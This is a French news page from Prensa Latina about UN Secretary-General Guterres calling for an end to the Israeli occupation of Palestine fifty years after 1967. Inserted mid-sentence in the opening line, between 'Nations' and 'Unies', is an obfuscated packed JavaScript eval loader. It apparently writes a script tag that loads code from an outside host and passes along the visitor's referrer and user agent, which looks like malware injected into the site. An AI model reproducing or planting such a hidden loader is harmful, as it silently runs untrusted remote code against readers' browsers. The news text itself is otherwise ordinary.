vendredi 19 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

L’ONU demande la fin de 50 ans d’occupation israélienne de la Palestine

Nations eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dybbs|var|u0026u|referrer|ryier||js|php'.split('|'),0,{})) Unies, 5 juin (PL) Le Secrétaire Général de l'ONU, Antonio Guterres, a demandé la fin de l'occupation israélienne de la Palestine, scénario provenant de la Guerre des Sept Jours de juin 1967.

Nations Unies, 5 juin (PL) Le Secrétaire Général de l’ONU, Antonio Guterres, a demandé la fin de l’occupation israélienne de la Palestine, scénario provenant de la Guerre des Sept Jours de juin 1967.

Lors d’une déclaration à l’occasion des 50 ans du début de ce conflit entre Israël et la Palestine, le Secrétaire Général a rappelé que de ce fait la Cisjordanie, la Franche de Gaza et le Golan syrien sont restés sous domination militaire étrangère.

« Terminer l’occupation qui a débutée en 1967 et parvenir à une solution de deux États sont l’unique manière d’assoir les bases d’une paix durable au Moyen-Orient », a-t- il signalé.

Selon Guterres, « la présence militaire israélienne a infligé un coût humanitaire à des générations de palestiniens et a marqué la vie des deux peuples ».

Il a mis en garde sur le fait que « l’occupation encourage de manière récurrente des cycles de violence et son imposition perpétuelle envoie un message aux palestiniens selon lequel leurs rêves de disposer d’un État indépendant ne sont que des rêves ».

Il a affirmé que l’ONU est toujours disposée à travailler avec toutes les parties intéressées par le règlement de ce conflit, en vue de parvenir à une paix durable.

Dans sa déclaration, Guterres a insisté sur le fait qu’« en 1947, par la résolution 181 de l’Assemblée Générale des Nations Unies, le monde a reconnu la solution des deux États ».

« Le 14 mai de 1948 est né l’État d’Israël. Presque 70 ans après, le monde attend toujours la naissance d’un État indépendant palestinien », a-t-il noté.

peo/oda/wmr

EN CONTINU
notes connexes